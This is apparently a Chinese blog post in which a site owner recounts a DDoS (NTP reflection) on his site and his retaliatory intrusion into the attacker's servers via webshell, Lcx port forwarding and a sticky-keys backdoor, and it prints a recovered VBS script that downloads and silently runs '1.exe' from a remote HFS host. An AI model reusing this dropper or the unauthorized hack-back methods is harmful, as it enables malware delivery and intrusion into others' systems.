【站内资讯】近日因遭大量DDOS攻击而反查大黑阔

最近小编的网站（刀客资源网）遭到大量DDOS攻击，前几天有人给我反应了这个问题。

刚开始，还没注意，觉得就这样吧，反正服务器费用也不贵，可能还赶不上DDOS的费用...

emmm~小编大概也知道是谁干的【滑稽】

那么接下来，咋办呐？

第一：小编一向讲求和气生财，信誉做事，努力追求双方的信任去赢得更多的信任和价值。小编愿意和各位互联网上的各位大神、小白成为朋友，但只有一个前提，你必须讲诚信。不管这个世界有多少人背信弃义，我，小编坚决坚守自己做人的底线和道德标准，我坚信，人若无信，难立于世。

第二：从接到热心网友反应，小编才开始逐渐重视起来，为什么呐？其一就是不能助长这种小人心理气焰，其二也是对做黑产的反调查吧。

第三：目前已经收集到80%的信息，从DDOS的攻击来源，反查到某黑阔地址以及相关信息以及emmm~自己感受。

顺着就是一顿反围剿（有点艰辛MMP），通过某IP查到某个熟悉类型的网站，然后菜刀，发现3389没开？搞TM的棒棒锤啊？

然后Lcx端口转发，服务器进行监听51端口，转发到33891端口,渗透进入内网，登陆服务器

一般的大黑阔就喜欢留下shift后门，然后五次shift，TMD就进来了，也可能这台服务器万人草，不过不像是【误会，嘿嘿~】。

登陆了某已经沦陷的服务器，查看日志，你以为这么简单就查到了？

nonono~，人家当然是把日志什么的都清理干净的啦~这样子就查到了，人家大黑阔岂不是要翻船？

进去以后仔仔细细反了个遍，mdzz，没有马儿跑？【除了我自己的小马在吃草】

这些ddos的菜逼黑客，一般就是什么自动抓鸡，每天疯狂扫描...(小编早已退出B界，没想到还有大黑客这么风骚)

于是马上连接到了另外一台在外网的服务器

创建的1的用户名，有毒吧？？？不知道换一个吗，比如去一个gvest也好啊，好歹产生一个干扰啊？

然后就找到了某些有趣的东西【滑稽】

Set psp = CreateObject("Msxml2.XMLHTTP")set ws=WScript.CreateObject("WScript.Shell")psp.Open "GET","http://117.*.*.*:9674/1.exe",0//这些黑客喜欢1.exe?psp.Send()Set aGet = CreateObject("ADODB.Stream")aGet.Mode = 3aGet.Type = 1aGet.Open()aGet.Write(psp.responseBody)aGet.SaveToFile "c:\1.exe",2wscript.sleep 8000ws.Run "c:\1.exe",0

这个vbs执行后是要下载一个名叫 1.exe的木马程序。然后我们就可以登陆对应HFS的117.*.*.*:9674(这熟悉的端口，我貌似想到了什么木马呐~，脑袋有点发散，哈~)

嗯，后面的就不多叙述了，就这样吧，其余的到时候看情况交给警方就行了.

我们去大草原的湖边，听候鸟飞回来，等我们都长大了....就这样吧~

**************************************************************************

忘了，我咋没说咋修复的呐？oopss~

对方使用NTP反射放大，也就大致放大700倍的样子，对方的攻击大致有160+的样子，关了ntp服务就好，参考下图：

妈蛋，图片没保存。。。

登陆xshell

按照下面的骚操作：

小编的网站当然不只是这么简单啦~，每天那个超级无敌大黑阔还在对着某个废弃服务器DDOS~【莫名喜感】